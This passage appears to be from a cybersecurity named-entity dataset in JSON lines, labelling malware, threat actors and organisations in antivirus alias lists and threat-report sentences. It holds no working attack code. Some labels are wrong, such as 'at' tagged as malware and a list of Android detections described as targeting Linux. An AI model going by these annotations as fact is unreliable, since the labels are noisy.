W32/MalwareS.U TROJ_RANSVB.SMA Trojan-Ransom.Win32.Chameleon.gfl Trojan.Win32.Chameleon.edluzm Trojan.Win32.A.FraudBlocker.9216.A[UPX] Win32.Trojan.Chameleon.Phqb Trojan.Winlock.364 Trojan.FakeAV.Win32.150033 W32/Risk.WDRB-6022 Trojan.Chameleon.c TR/Ransom.VB.BN Trojan:Win32/SMSer.F Troj.Downloader.W32.Small.l5Bd Trojan-Ransom.Win32.Chameleon.gfl Trojan/Win32.Chameleon.C2304852 SScope.Trojan.Validium.va Trojan.FraudBlocker!3BdV5QfTi3g Trojan-Ransom.Win32.Fullscreen W32/LockScreen.CH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005119", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9993 Win32/Tnega.THZ BehavesLike.Win32.Downloader.hh PWS:Win32/Tibia.BB Trojan.Zusy.Elzob.D6208 Trojan/Win32.Scar.R8662", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005120", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Exploit/W32.CAN.28672 Exploit.CAN Trojan/Exploit.CAN.2002-0649.a TROJ_SQLEXP.A TROJ_SQLEXP.A Win.Trojan.Exploit-173 Exploit.Win32.CAN.2002-0649.a Exploit.Win32.CAN-2002-0649.gpav 
Trojan.Win32.Exploit.28672.A Exploit.W32.CAN.2002-0649.a!c Exploit.Sqlck Exploit.CAN.Win32.23 W32/Risk.DCEZ-2564 Exploit.CAN.g TR/Expl.CAN-2002-0649.A Trojan[Exploit]/Win32.CAN Exploit.Win32.CAN.2002-0649.a Exploit:Win32/CAN20020649.A Exploit.CAN Win32/Exploit.CAN-2002-0649.A Win32.Exploit.Can.Eeqq W32/ThcSQL.A!exploit Win32/Trojan.Exploit.96c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005121", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.Trojan Trojan.Win32.DownLoad3.evepic Win32.Trojan.Spy.Pgde Trojan.DownLoad3.47177 BehavesLike.Win32.Downloader.lm W32/Trojan.XTOU-1556 Trojan:Win32/Netfosor.A!dha Trojan/Win32.Netfosor.C1246582 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005122", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Deborm.AC@mm Worm.Win32.Deborm!O Worm.Deborm Win32.Deborm.AC@mm Win32.Trojan.WisdomEyes.16070401.9500.9895 W32.HLLW.Deborms Win.Downloader.88-1 Win32.Deborm.AC@mm Worm.Win32.Deborm.ac Win32.Deborm.AC@mm Trojan.Win32.Deborm.fvmw Worm.W32.Deborm!c Win32.Deborm.AC@mm Win32.HLLW.Deborm.27 BehavesLike.Win32.Downloader.nz BehavesLike.Win32.ExplorerHijack WORM/Deborm.AC Worm:Win32/Deborm.AC Win32.Deborm.E5BBB3 Worm.Win32.Deborm.ac Worm.Deborm Win32.Deborm.AC@mm Trj/CI.A Win32.Worm.Deborm.Pjxe", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005123", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.10163 Trojan.Barys.DE0C3 Win32/Tnega.CfKWaYC Trojan.Click2.60391 BehavesLike.Win32.Autorun.vc Trojan-Banker.Win32.Banker HackTool:Win32/Asoka.A Unwanted/Win32.HackTool.R76574", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005125", "source": "cyner2_train"}} {"text": "Talos has identified an email-based attack targeting the energy sector, including nuclear power, that puts a new spin on the classic word document 
attachment phish.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "ORGANIZATION: the energy sector,": [[53, 71]], "ORGANIZATION: nuclear power,": [[82, 96]]}, "info": {"id": "cyner2_train_005126", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9926 Trojan-Downloader.Win32.Delf.koxi Trojan.Win32.Delf.eurqqv Trojan.Win32.Z.Delf.2321408 Downloader.Delf.Win32.55823 BehavesLike.Win32.Dropper.vh W32/Trojan.VVSX-7495 TR/Dldr.Delf.xofbe Trojan-Downloader.Win32.Delf.koxi Trj/GdSda.A Trojan-Downloader.Win32.Delf W32/Delf.CFW!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005127", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9963 W32.Mytob@mm Net-Worm.Win32.Mytob.bf W32.W.VBNA.tni6 TrojWare.Win32.TrojanDownloader.Delf.accr Win32.HLLM.MyDoom.based BehavesLike.Win32.Trojan.pc Net-Worm.Win32.Mytob Worm/Mytob.atd WORM/Mytob.MD Trojan/Win32.Rukap.C17970 Win32.Trojan.Hoster.Heur", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005128", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Small!O Win32.Trojan.WisdomEyes.16070401.9500.9996 Backdoor.Trojan BKDR_PUDORATE.A Win.Trojan.Pudorat-2 Trojan-Dropper.Win32.Small.ix Trojan.Win32.Pudorat.uvlp BackDoor.PudoRat Dropper.Small.Win32.205 BKDR_PUDORATE.A W32/Trojan.ATSN-3573 Backdoor/Pudorat.e BDS/Pudorat.E.Srv Trojan[Backdoor]/Win32.Pudorat Trojan.Graftor.Elzob.D2736 Trojan-Dropper.Win32.Small.ix Backdoor:Win32/Pudorat.E Trojan/Win32.Small.R102192 Backdoor.Pudorat Trojan.DR.Small!n8WI7XFkeRA Backdoor.Win32.Pudorat.G W32/Pudorat.E!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005130", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Katusha.Win32.25040 Win.Trojan.357100-1 Trojan.Win32.Abacab.zfokj BackDoor.Abacab.102 Trojan[Backdoor]/Win32.Revell Backdoor:Win32/Revell.1_02 
Win32.Virus.Temcac.A@dam W32/Revll.102!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005131", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.TrodowsLTK.Trojan Trojan/Cosmu.atqv BehavesLike.Win32.AdwareRBlast.dm Trojan.Zusy.Elzob.D560E Trojan.Win32.A.Cosmu.83456[h] Dropper/Malware.253952.FL TrojanDropper:Win32/Blmoon.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005132", "source": "cyner2_train"}} {"text": "DOC and XLS files with malicious macros", "spans": {"MALWARE: malicious macros": [[23, 39]]}, "info": {"id": "cyner2_train_005133", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropped:Trojan.Downloader.VU TrojanDownloader.Podcast Trojan/Downloader.Adload.ci Win32.Trojan.WisdomEyes.16070401.9500.9963 W32/Downloader.AIEZ TROJ_DLOADR.CH Win.Downloader.Adload-85 Dropped:Trojan.Downloader.VU Trojan-Downloader.Win32.Adload.amn Dropped:Trojan.Downloader.VU Trojan.Win32.Delf.epwf Trojan.Win32.Downloader.140800.D Dropped:Trojan.Downloader.VU TrojWare.Win32.TrojanDownloader.Adload.CI Dropped:Trojan.Downloader.VU Trojan.DownLoader6.4157 TROJ_DLOADR.CH BehavesLike.Win32.Fujacks.cc Downloader.Delphi W32/Downloader.RKBR-2696 TrojanDownloader.Adload.hk Adware.DollarRevenue TR/Drop.Start.abk.4 Trojan[Downloader]/Win32.Adload Trojan.Downloader.VU Troj.Downloader.W32.Adload.amn!c Trojan-Downloader.Win32.Adload.amn Trojan/Win32.Banload.R41470 Dropped:Trojan.Downloader.VU Trojan-Downloader.Win32.10213 Win32/TrojanDownloader.Adload.CI Win32.Trojan-downloader.Adload.Pkqr Trojan.DL.Adload!u3IAhoIxyiU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005134", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.FcodeNHc.Trojan Trojan.Dorv.S8319 Ransom.FileLocker Trojan.Foreign.Win32.9536 Ransom.FileLocker/Variant Trojan/Kryptik.aykk Win32.Trojan.Filecoder.u RANSOM_CRYPNAN_GA250444.UVPM Trojan.Win32.Encoder.egvznv 
Trojan-Ransom.Win32.FileCoder.nan Backdoor.Win32.Hlux.NAN Trojan.Encoder.217 RANSOM_CRYPNAN_GA250444.UVPM BehavesLike.Win32.PWSZbot.dh Trojan/Foreign.ewc Trojan[Ransom]/Win32.Foreign Ransom:Win32/Haperlock.A Trojan.Symmi.D4C7E Trojan/Win32.Foreign.R61679 BScope.Malware-Cryptor.Hlux Win32/Filecoder.NAN Trojan.Foreign!VfdOCZ5FB8A Trojan.Win32.Sisron Trj/Dtcontx.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005135", "source": "cyner2_train"}} {"text": "This report contains indicators of compromise IOCs and technical details on the tactics, techniques, and procedures TTPs used by APT actors on compromised victims' networks.", "spans": {"THREAT_ACTOR: APT actors": [[129, 139]], "SYSTEM: victims' networks.": [[155, 173]]}, "info": {"id": "cyner2_train_005136", "source": "cyner2_train"}} {"text": "List of PlugX Command And Control servers used to attack targets in Asia.", "spans": {"MALWARE: PlugX": [[8, 13]]}, "info": {"id": "cyner2_train_005137", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Chyopic!O Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_OGRAN.A Win.Trojan.Downloader-30022 Trojan.Win32.Chyopic.bksyf Trojan.Win32.S.Downloader.9984.A Backdoor.W32.Chyopic.bu!c Backdoor.Win32.Chyopic.A BackDoor.ClDdos.6 TROJ_OGRAN.A BehavesLike.Win32.FDoSBEnergy.zh TrojanDownloader.Ogran.j Trojan:Win32/Chcod.A Trojan[Backdoor]/Win32.Chyopic Trojan:Win32/Chcod.A Trojan/Win32.HDC.C33704 Trojan.Chcod!5jj9mkC/wqU Backdoor.Win32.Chyopic Win32/Backdoor.7b0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005138", "source": "cyner2_train"}} {"text": "The customization doesn t end with the lure; the malware used in the campaigns is also targeted by region and vertical.", "spans": {"MALWARE: malware": [[49, 56]], "THREAT_ACTOR: campaigns": [[69, 78]]}, "info": {"id": "cyner2_train_005139", "source": "cyner2_train"}} {"text": "A backdoor also known as: Risktool.Flystudio.17330 DDOS_NITOL.SMD 
DDOS_NITOL.SMD Win.Trojan.7486152-1 Backdoor.Win32.Sethift.a Trojan.Win32.Spambot.wpwqo Trojan.Spambot.10932 BehavesLike.Win32.Downloader.qc Trojan.Win32.MicroFake Backdoor.Win32.Sethift.a Backdoor:Win32/Payduse.A!bit Trojan/Win32.PbBot.R11181 Trojan.Cosmu Trj/CI.A W32/Nitol.C Win32/Trojan.b7f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005140", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G W32.Virut.CF Win32/Virut.17408 PE_VIRUX.Q Win.Trojan.Virut-377 Virus.Win32.Virut.q Virus.Win32.Virut.hpeg Win32.Virut.5 Virus.Virut.Win32.1938 PE_VIRUX.Q BehavesLike.Win32.Ipamor.lh Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.cr.61440 Virus:Win32/Virut.BN W32.Virut.l5he Virus.Win32.Virut.q Win32/Virut.F Virus.Virut.13 Win32/Virut.NBP Backdoor.Win32.DsBot W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005141", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: Android.Trojan.FakeApp.FC Trojan:Fakebank.B Android.Trojan.FakeApp.FC HEUR:Trojan-Banker.AndroidOS.Asacub.ab A.H.Ste.Banker.B Android.BankBot.221.origin HEUR:Trojan-Banker.AndroidOS.Asacub.ab Android-Trojan/Banker.5d288 a.privacy.spiderbank Trojan-Banker.AndroidOS.RuBank Android/SpyBanker.HH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005142", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS.Win32.Banker.1!O Trojan/Kryptik.adfi Win32.Trojan.WisdomEyes.16070401.9500.9985 Infostealer.Bancos TROJ_BANKPTCH.SMA Trojan.PWS.Banker1.4670 TROJ_BANKPTCH.SMA Trojan-PWS.Win32.Banker Trojan/Menti.uci W32.Infostealer.Banker TR/Menti.A.2 Trojan/Win32.Unknown PWS:Win32/Banjori.A Trojan.Kazy.DFB0D TScope.Malware-Cryptor.SB W32/Krypt.CLE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005145", "source": "cyner2_train"}} {"text": "A backdoor also known as: PDF/Dropper.C!Camelot 
Bloodhound.PDF.24 PDF/Exploit.Pidief.PIT Heuristics.PDF.ObfuscatedNameObject Trojan.Script.ExpKit.esqnwi Exploit.PDF.Pidief.f Exploit.PDF.889 HEUR_PDFEXP.D BehavesLike.PDF.BadFile.dx PDF/Dropper.C EXP/Pidief.akc Exploit:Win32/Pdfdrop.D JS/SARS.S139 possible-Threat.PDF.Acmd VBS/BanLoader.BBAF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005146", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9772 Win32.Worm.Autorun.R Trojan.Win32.Inject.srauk Heur.Packed.Unknown Trojan/Jorik.bmit TrojanDownloader:Win32/Roker.A W32/Llac.SHV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005147", "source": "cyner2_train"}} {"text": "And in an unusual reversal of typical bank phishing social engineering tactics, the phishing emails purport to be from the bank's customers.", "spans": {"ORGANIZATION: the bank's customers.": [[119, 140]]}, "info": {"id": "cyner2_train_005148", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.B01F Ransom_Troldesh.R011C0DB318 Win32.Trojan.WisdomEyes.16070401.9500.9997 Ransom_Troldesh.R011C0DB318 Trojan-Ransom.Win32.Shade.onr Troj.Ransom.W32.Shade!c Trojan.MulDrop7.59017 BehavesLike.Win32.ObfusRansom.dc TR/Injector.cjsif Ransom:Win32/Troldesh.A Trojan-Ransom.Win32.Shade.onr Trojan/Win32.Shade.R219897 TrojanRansom.Shade Ransom.Shade Trj/CI.A NSIS/Injector.YO Win32.Trojan.Shade.Szbw W32/Injector.YD!tr Win32/Trojan.Ransom.c29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005150", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ServicesIpripA.Trojan Trojan.Ripinip.C Backdoor/W32.Ripinip.20480.L Backdoor.Win32.Ripinip!O Backdoor.Ripinip.28625 Trojan.Ripinip.C Backdoor/Ripinip.eea Trojan.Ripinip.C Win32.Backdoor.Ripinip.b Backdoor.Ripinip BKDR_RIPNIP.SMIA Win.Trojan.Ripnip-3 Trojan.Ripinip.C Backdoor.Win32.Ripinip.eea Trojan.Ripinip.C Trojan.Win32.Ripinip.buwod 
Backdoor.Win32.A.Ripinip.20480 Trojan.Ripinip.C Backdoor.Win32.Ripinip.~eea Trojan.Ripinip.C Win32.HLLW.Autoruner.28406 BackDoor-EVC.a Backdoor.Win32.Ripinip BDS/Ripinip.BN Trojan[Backdoor]/Win32.Ripinip Backdoor:Win32/Ripinip.C Backdoor/Win32.Ripinip.R1964 Backdoor.Win32.Ripinip.eea Win32/Ripinip.AP BackDoor-EVC.a TScope.Malware-Cryptor.SB Backdoor.Win32.Rip.tji Backdoor.Win32.Ripinip.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005151", "source": "cyner2_train"}} {"text": "Recently a new Carbanak attack campaign dubbed Digital Plagiarist was exposed where the group used weaponized office documents hosted on mirrored domains, in order to distribute malware.", "spans": {"THREAT_ACTOR: Carbanak attack campaign": [[15, 39]], "THREAT_ACTOR: Digital Plagiarist": [[47, 65]], "THREAT_ACTOR: group": [[88, 93]], "MALWARE: malware.": [[178, 186]]}, "info": {"id": "cyner2_train_005152", "source": "cyner2_train"}} {"text": "For instance, Sphinx ZeuS has enhanced its capabilities because of the Olympics.", "spans": {"MALWARE: Sphinx ZeuS": [[14, 25]], "ORGANIZATION: Olympics.": [[71, 80]]}, "info": {"id": "cyner2_train_005153", "source": "cyner2_train"}} {"text": "Like BlackEnergy, the malware used by the so-called Sandworm APT group also known as Quedagh, Potao is an example of targeted espionage malware directed mostly at targets in Ukraine and a number of other post-Soviet countries, including Russia, Georgia and Belarus.", "spans": {"THREAT_ACTOR: BlackEnergy,": [[5, 17]], "MALWARE: malware": [[22, 29]], "THREAT_ACTOR: Sandworm APT group": [[52, 70]], "THREAT_ACTOR: Quedagh,": [[85, 93]], "MALWARE: Potao": [[94, 99]], "MALWARE: targeted espionage malware": [[117, 143]], "MALWARE: at": [[160, 162]]}, "info": {"id": "cyner2_train_005154", "source": "cyner2_train"}} {"text": "With their assistance, we have confirmed over 76 additional messages containing NSO exploit links.", "spans": {"MALWARE: NSO exploit links.": [[80, 98]]}, "info": {"id": 
"cyner2_train_005158", "source": "cyner2_train"}} {"text": "A backdoor also known as: Troj.Downloader.W32.AutoIt Trojan.Win32.Pasta.ztb Trojan.DownLoader11.57616 Trojan.Strictor.DE515 Trojan/Win32.Inject Trojan.Pasta IM-Worm.Win32.Sohanad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005161", "source": "cyner2_train"}} {"text": "This ransomware is developed using the Go programming language.", "spans": {"MALWARE: ransomware": [[5, 15]], "SYSTEM: the Go programming language.": [[35, 63]]}, "info": {"id": "cyner2_train_005162", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zusy.D3D963 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.PWS.Stealer.17779 BehavesLike.Win32.PUPXAG.fc Trojan.MSIL.gotl Trojan:MSIL/Elmb.A!bit Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005163", "source": "cyner2_train"}} {"text": "Electronicfrontierfoundation.org was not the only domain involved in this attack.", "spans": {}, "info": {"id": "cyner2_train_005164", "source": "cyner2_train"}} {"text": "ITG03 used several previously unreported malwares, including backdoor and PowerShell scripts suggesting continued ITG03 interest in exploiting SWIFT three years after its initial campaign in 2016.", "spans": {"THREAT_ACTOR: ITG03": [[0, 5], [114, 119]], "MALWARE: malwares,": [[41, 50]], "MALWARE: backdoor": [[61, 69]], "SYSTEM: PowerShell scripts": [[74, 92]], "VULNERABILITY: exploiting SWIFT": [[132, 148]], "THREAT_ACTOR: campaign": [[179, 187]]}, "info": {"id": "cyner2_train_005166", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Kelopol.A3 W32/Application.USPT-4138 Hacktool.Keylogger PWS:MSIL/Kelopol.B Trojan.Win32.KeyLogger.ctnnso Trojan.KeyLogger.14630 TSPY_KELOPOL.SM TR/Habbo.skdh Trojan.MSIL.Krypt.5 Trojan/Win32.Vapsup.R122716", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005168", "source": "cyner2_train"}} {"text": "In 2015, many of these 
techniques and activities remain in use.", "spans": {}, "info": {"id": "cyner2_train_005169", "source": "cyner2_train"}} {"text": "In today's article, AnyRun look at LimeRAT, a modular piece of malware designed to give attackers control over a victim's computer and use it for crypto-mining or DDoS attacks.", "spans": {"ORGANIZATION: AnyRun": [[20, 26]], "MALWARE: LimeRAT,": [[35, 43]], "MALWARE: modular piece of malware": [[46, 70]], "THREAT_ACTOR: attackers": [[88, 97]], "SYSTEM: victim's computer": [[113, 130]]}, "info": {"id": "cyner2_train_005170", "source": "cyner2_train"}} {"text": "We have dubbed the groups latest campaign Digital Plagiarist for its signature practice of mirroring legitimate sites using Tenmaxs TelePort Pro and TelePort Ultra site mirroring software onto similarly named domains, on which the TelePort Crew would host and serve up malware laden Office documents.", "spans": {"THREAT_ACTOR: groups": [[19, 25]], "THREAT_ACTOR: campaign Digital Plagiarist": [[33, 60]], "MALWARE: Tenmaxs TelePort Pro": [[124, 144]], "MALWARE: TelePort Ultra site mirroring software": [[149, 187]], "THREAT_ACTOR: the TelePort Crew": [[227, 244]], "MALWARE: malware": [[269, 276]]}, "info": {"id": "cyner2_train_005172", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Kolweb!O Trojan.Lokrodem.25745 Trojan.Kolweb.Win32.139 Troj.W32.Kolweb.mBu8 Trojan/Kolweb.a Win32.Trojan.WisdomEyes.16070401.9500.9687 Adware.Margoc Win32/Startpage.SK Win.Trojan.Kolweb-96 Trojan.Win32.Kolweb.a Trojan.Win32.Kolweb.cxqwlv Trojan.Win32.A.Kolweb.224389[ASPack] Trojan.PWS.Mirka BehavesLike.Win32.Sality.fc Trojan/Kolweb.cm TR/Delf.CF.13 Trojan/Win32.Kolweb Trojan:Win32/Lokrodem.A.dll Trojan.Win32.Kolweb.a Trojan/Win32.Kolweb.C12167 Trojan.Kolweb Trojan.Graftor.D33DE Win32.Trojan.Kolweb.Edns Trojan.PWS.Delf!+6OEG1VoGF8 Win32/Trojan.f0c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005173", "source": "cyner2_train"}} {"text": "In the case of 
Hancitor, it still seen as a favourite carrier of very much active malware families such as Pony and Vawtrak.", "spans": {"MALWARE: Hancitor,": [[15, 24]], "MALWARE: malware families": [[82, 98]], "MALWARE: Pony": [[107, 111]], "MALWARE: Vawtrak.": [[116, 124]]}, "info": {"id": "cyner2_train_005175", "source": "cyner2_train"}} {"text": "We believe that the operators of the Bunitu botnet are selling access to infected proxy bots as a way to monetize their botnet.", "spans": {"MALWARE: Bunitu botnet": [[37, 50]], "VULNERABILITY: selling access": [[55, 69]], "MALWARE: botnet.": [[120, 127]]}, "info": {"id": "cyner2_train_005176", "source": "cyner2_train"}} {"text": "In May 2018, ITG03 actors stole $10 million from the Banco de Chile.", "spans": {"THREAT_ACTOR: ITG03 actors": [[13, 25]], "ORGANIZATION: the Banco de Chile.": [[49, 68]]}, "info": {"id": "cyner2_train_005177", "source": "cyner2_train"}} {"text": "Our telemetry shows that H-W0rm is one of the most active RATs we ve seen, with infections observed across virtually all enterprise verticals and geographies in which Fidelis Cybersecurity products are deployed.", "spans": {"MALWARE: H-W0rm": [[25, 31]], "MALWARE: RATs": [[58, 62]], "ORGANIZATION: enterprise": [[121, 131]], "ORGANIZATION: Fidelis Cybersecurity": [[167, 188]], "SYSTEM: products": [[189, 197]]}, "info": {"id": "cyner2_train_005178", "source": "cyner2_train"}} {"text": "Its price starts around $2500 which is more than double the price of another recent entry to the market.", "spans": {}, "info": {"id": "cyner2_train_005179", "source": "cyner2_train"}} {"text": "In April 2017 we started observing new rooting malware being distributed through the Google Play Store.", "spans": {"MALWARE: new rooting malware": [[35, 54]], "SYSTEM: the Google Play Store.": [[81, 103]]}, "info": {"id": "cyner2_train_005181", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan:MSIL/Ploprolo.A", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005183", "source": "cyner2_train"}} {"text": "In order to infect the victims, the attackers distributed spear-phishing emails containing malicious word document, the email purported to have been sent from legitimate email ids.", "spans": {"THREAT_ACTOR: attackers": [[36, 45]], "MALWARE: malicious word document,": [[91, 115]]}, "info": {"id": "cyner2_train_005184", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MTSysAntiD.Worm Packed.Win32.Klone!O PWS-OnlineGames.es PE_MAGOVEL.A Win32.Virus.Induc.b W32/Induc.A Trojan.Packed.16 PE_MAGOVEL.A Win.Trojan.Packed-77 Virus.Win32.Induc.b Trojan.Win32.Downloader.85504.AX Backdoor.Win32.Delf.~DD Win32.HLLP.Lagic Backdoor.Hupigon.Win32.100099 BehavesLike.Win32.MultiPlug.nc W32/Induc.A Win32.Troj.Klone.ab.389660 W32.Induc.tnqE Virus.Win32.Induc.b PWS:Win32/Magovel.A Backdoor/Win32.Hupigon.C61571 Virus.Win32.Induc.c RiskWare.NakedPack Win32.Induc.A Backdoor.Rbot Virus.Win32.Viking.AV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005185", "source": "cyner2_train"}} {"text": "We have seen this threat access online content, including:JDUDUIFIB.exe", "spans": {"MALWARE: threat": [[18, 24]]}, "info": {"id": "cyner2_train_005186", "source": "cyner2_train"}} {"text": "A June 23 FireEye blog post titled Operation Clandestine Wolf discussed a cyber espionage group, known as APT3, that had been exploiting a zero-day vulnerability in Adobe Flash.", "spans": {"ORGANIZATION: FireEye": [[10, 17]], "THREAT_ACTOR: Operation Clandestine Wolf": [[35, 61]], "THREAT_ACTOR: cyber espionage group,": [[74, 96]], "THREAT_ACTOR: APT3,": [[106, 111]], "VULNERABILITY: zero-day vulnerability": [[139, 161]], "SYSTEM: Adobe Flash.": [[165, 177]]}, "info": {"id": "cyner2_train_005189", "source": "cyner2_train"}} {"text": "We collected a list of hashes and the files corresponding to those hashes were then retrieved from VirusTotal for further 
analysis.", "spans": {"ORGANIZATION: VirusTotal": [[99, 109]]}, "info": {"id": "cyner2_train_005191", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.VBKrypt Spyware.Pony Downloader.Ponik TSPY_HPFAREIT.SMB Trojan.Win32.VBKrypt.ymio Trojan.Win32.VBKrypt.evkxoj Trojan.VBKrypt.Win32.291698 BehavesLike.Win32.Fareit.ch Trojan.VBKrypt.cgbs TR/Dropper.VB.ocnhj Trojan.Win32.VBKrypt.ymio Trojan/Win32.VBKrypt.R213345 Trojan.VBKrypt Trj/GdSda.A Win32.Trojan.Vbkrypt.Amwf Trojan.VBKrypt!wORN5qK9fN4 Trojan.VB.Crypt W32/FareitVB.BEOK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005192", "source": "cyner2_train"}} {"text": "A week later, an anonymous user, supposedly the author of AES-NI ransomware the XData is based on, released the master private key.", "spans": {"ORGANIZATION: anonymous user,": [[17, 32]], "THREAT_ACTOR: author": [[48, 54]], "MALWARE: AES-NI ransomware": [[58, 75]], "MALWARE: XData": [[80, 85]]}, "info": {"id": "cyner2_train_005194", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod8cd.Trojan.9e70 Backdoor/W32.BlackAngel.780304 W32/Backdoor.AAVE-7405 Backdoor.Trojan BKDR_BLAKANGEL.A Backdoor.Win32.BlackAngel.05 Trojan.Win32.BlackAngel.hiov Backdoor.Win32.BlackAngel.780304 Backdoor.W32.BlackAngel.05!c Backdoor.Win32.BlackAngel.05 BackDoor.BlackAngel.5 Backdoor.BlackAngel.Win32.6 BKDR_BLAKANGEL.A BehavesLike.Win32.PWSZbot.bc W32/Backdoor.DMA Backdoor/BlackAngel.05 BDS/BlackAngel.05 W32/BlackAn.05!tr.bdr Trojan[Backdoor]/Win32.BlackAngel Backdoor.Win32.BlackAngel.05 Backdoor:Win32/BlackAngel.0_5 Backdoor.BlackAngel Win32/BlackAngel.05 Win32.Backdoor.Blackangel.Lndw Backdoor.Win32.BlackAngel", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005195", "source": "cyner2_train"}} {"text": "Since late November 2016, the Shamoon 2 attack campaign has brought three waves of destructive attacks to organizations within Saudi Arabia.", "spans": {"THREAT_ACTOR: campaign": [[47, 
55]], "ORGANIZATION: organizations": [[106, 119]]}, "info": {"id": "cyner2_train_005196", "source": "cyner2_train"}} {"text": "Only this time, it's a Hangul Word Processor HWP document leveraging the already known CVE-2015-2545 Encapsulated PostScript EPS vulnerability.", "spans": {"VULNERABILITY: Encapsulated PostScript EPS vulnerability.": [[101, 143]]}, "info": {"id": "cyner2_train_005198", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Sacto.e Trojan.Graftor.D1DEE6 BKDR_SACTO.SM0 Win32.Trojan.WisdomEyes.16070401.9500.9983 Backdoor.Trojan BKDR_SACTO.SM0 TrojWare.Win32.Sacto.A Trojan.PWS.Multi.1194 Backdoor:Win32/Sacto.A!dha W32/Sacto.E!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005199", "source": "cyner2_train"}} {"text": "A backdoor also known as: Java.Exploit.CVE-2015-2590.A Java.Exploit.CVE-2015-2590.A Java.Exploit.CVE-2015-2590.A Exploit.Java.CVE20120507.cqxpdq Java/Downloader.BM Exp.CVE-2015-2590 JAVA_DLOADR.EFD Java.Exploit.CVE-2015-2590.A Java.Exploit.CVE-2015-2590.A Java.Downloader.1103 JAVA_DLOADR.EFD BehavesLike.Java.Downloader.zj Java/Downloader.BM Java.Exploit.CVE-2015-2590.A TrojanDownloader:Java/Reamshunt.A Java.Exploit.CVE-2015-2590.A Java.Exploit.CVE-2015-2590.A Exploit.Java_c.QQT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005200", "source": "cyner2_train"}} {"text": "For the past several weeks, Forcepoint Security Labs have been tracking a seemingly low-profile piece of malware which piqued 